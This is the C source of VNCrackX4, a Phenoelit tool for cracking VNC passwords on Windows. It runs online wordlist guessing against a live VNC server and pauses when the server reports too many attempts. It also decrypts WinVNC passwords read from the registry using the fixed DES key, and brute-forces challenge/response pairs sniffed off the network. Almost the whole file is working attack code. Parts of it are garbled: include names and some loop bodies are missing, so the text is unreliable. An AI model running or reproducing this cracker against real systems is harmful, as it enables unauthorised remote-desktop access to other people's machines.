/* Project code: vncrack for windows (vnx4) * * FX * Phenoelit (http://www.phenoelit.de/) * (c) 2k * */ #include #include #include #include #include #include "d3des.h" #include "vncauth.h" extern unsigned char fixedkey[8]; #define SPLASH "VNCrackX4 - by Phenoelit (http://www.phenoelit.de/)\n" int verbose=0,lbf=0; char *schallange=NULL, *sresponse=NULL; void interactive(void); void cr_crack(char *wordlist); void *sec_malloc(size_t size) { void *p; if ((p=malloc(size))==NULL) { fprintf(stderr,"malloc() failed for %d bytes\n",size); exit (-1); } memset(p,0,size); return p; } void usage(void) { printf("VNCrackX4\n" "by Phenoelit (http://www.phenoelit.de/)\n\n"\ "Usage:\n" "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n" "Windows interactive mode: ./vncrack -W \n" "\tenter hex key one byte per line - find it in\n" "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n" "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n" "Options for online mode:\n" "-v\tverbose (repeat -v for more)\n" "-p P\tconnect to port P instead of 5900\n" "Options for PHoss intercepted challages:\n" "-c \tchallange from PHoss output\n" "-r \tresponse from PHoss output\n" ); exit(-1); } void sleep(DWORD ms) { DWORD t1; t1=GetTickCount(); while (GetTickCount()<(t1+ms)); } int main(int argc, char **argv) { int sfd; /* socket */ unsigned long dest_ip; struct sockaddr_in dest_addr; char *rbuf; unsigned char atype[4]; unsigned char challange[16]; char *vnchost=NULL; u_short vncport=5900; int i,ani=0; char *wordlist=NULL; FILE *fd; char *tryword; char servertext[255]; char *sthelp; int conwait=90; /* check the command line options */ for (i=1;i8) tryword[8]='\0'; tryword[strlen(tryword)-1]='\0'; if (verbose) { printf("\ntrying '%s' ...",tryword); fflush(stdout); } if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))!=0) { fprintf(stderr,"Connect failed.\n"); exit(-1); } /* connunication starts with server->client version packet */ rbuf=sec_malloc(100); if (recv(sfd,rbuf,100,0)<0) { fprintf(stderr,"recv()"); exit(-1); } if (verbose>1) printf("\nServer Protocol version: %s",rbuf); /* bounce this message back - so the server will continue */ if (send(sfd,rbuf,strlen(rbuf),0)<0) { fprintf(stderr,"send()"); exit(-1); } if (recv(sfd,atype,sizeof(atype),0)<0) { fprintf(stderr,"recv()"); exit(-1); } if (verbose>1) { printf("Authentication type: "); for (i=0;i<4;i++) { printf("%x ",atype[i]); } printf("\n"); } switch (atype[3]) { case 0: fprintf(stderr,"Server told me: connection close\n"); if (verbose) { // try to retrieve the reason memset(servertext,0,sizeof(servertext)); if (recv(sfd,servertext,sizeof(servertext),0)<0) { fprintf(stderr,"recv() in verbose"); exit(-1); } else { sthelp=servertext; sthelp+=4; fprintf(stderr,"Server says: %s\n",sthelp); } } exit(-1); break; /* not reached */ case 1: printf( "\n>>>>>>>>>>>>>>>\n" "Server does not require authentication!\n" ">>>>>>>>>>>>>>>\n"); exit(-1); break; /* not reached */ case 2: if (verbose>1) printf( "Authentication type 'VNC authentication' - fine\n"); break; default: fprintf(stderr,"Unknown authentication requested by server\n"); exit(-1); } if (recv(sfd,challange,sizeof(challange),0)<0) { fprintf(stderr,"recv()"); exit(-1); } if (verbose>1) { printf("challange: "); for (i=0;i<16;i++) { printf("%x ",challange[i]); } printf("\n"); } /* encrypt challange with password and send this fuck to the server */ vncEncryptBytes(challange,tryword); if (send(sfd,challange,sizeof(challange),0)<0) { fprintf(stderr,"auth send()"); exit(-1); } atype[3]=0; if (recv(sfd,atype,sizeof(atype),0)<0) { fprintf(stderr,"auth recv()"); exit(-1); } switch (atype[3]) { case 0: printf( "\n>>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n",tryword); free(tryword); exit(0); break; /* not reached */ case 1: /* 'normal' failed */ if (verbose) printf("failed\n"); break; case 2: /* too many */ printf("Server is angry, waiting for calm down...\n"); sleep(10000); break; default: fprintf(stderr,"Unknown response\n"); exit(-1); } shutdown(sfd,2); closesocket(sfd); memset(tryword,0,256); } free(tryword); fclose(fd); return 0; } void interactive(void) { unsigned char *pass; int i; char c; pass=(char *)sec_malloc(9); for (i=0;i<8;i++) { scanf("%x",&c); pass[i]=c; } printf("Entered HEX String: "); for (i=0;i<8;i++) { printf("%x ",pass[i]); } printf("\n"); deskey(fixedkey,DE1); des(pass,pass); printf("VNC Password: %s\n",pass); exit(0); } void cr_crack(char *wordlist) { int i,j; #define CRL 16 char chl[CRL+1]; char rsp[CRL+1]; char tchl[CRL+1]; char ts[3]; FILE *fd; char *tryword; char bft[9]; char cset1[] = "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>?\0"; #define cset1_len (92) int cnt[8]; time_t t1,t2; if (!wordlist) { fprintf(stderr,"Supply wordlist file !"); exit(-1); } if ((!schallange)||(!sresponse)) { usage(); } if ( (strlen(schallange)!=16*2) ||(strlen(sresponse)!=16*2) ) { fprintf(stderr, "challange and response have to be 32 characters each\n"); exit (-1); } memset(&chl,0,CRL+1); memset(&tchl,0,CRL+1); memset(&rsp,0,CRL+1); memset(&ts,0,3); j=0; for (i=0;i1) { for (i=0;i>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n",tryword); free(tryword); exit(0); } else { if (verbose) printf("%s failed\n",tryword); } memset(tryword,0,256); } fclose(fd); free(tryword); printf( "-----------------------------------\n" "Wordlist failed - going brute force\n" "-----------------------------------\n" ); t1=GetTickCount(); bft[8]='\0'; bft[1]='\0'; printf("\tdepth I\n"); for (cnt[0]=0;cnt[0]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 bft[2]='\0'; printf("\tdepth II\n"); for (cnt[1]=0;cnt[1]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 /************/ bft[3]='\0'; printf("\tdepth III\n"); for (cnt[2]=0;cnt[2]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 /************/ bft[4]='\0'; printf("\tdepth IV\n"); for (cnt[3]=0;cnt[3]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 /************/ bft[5]='\0'; printf("\tdepth V\n"); for (cnt[4]=0;cnt[4]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 /************/ bft[6]='\0'; printf("\tdepth VI\n"); for (cnt[5]=0;cnt[5]>>>>>>>>>>>>>>\n" "Password: %s\n" ">>>>>>>>>>>>>>>\n", bft); exit (0); } } // for 0 } // for 1 } //2 } //3 } //4 } //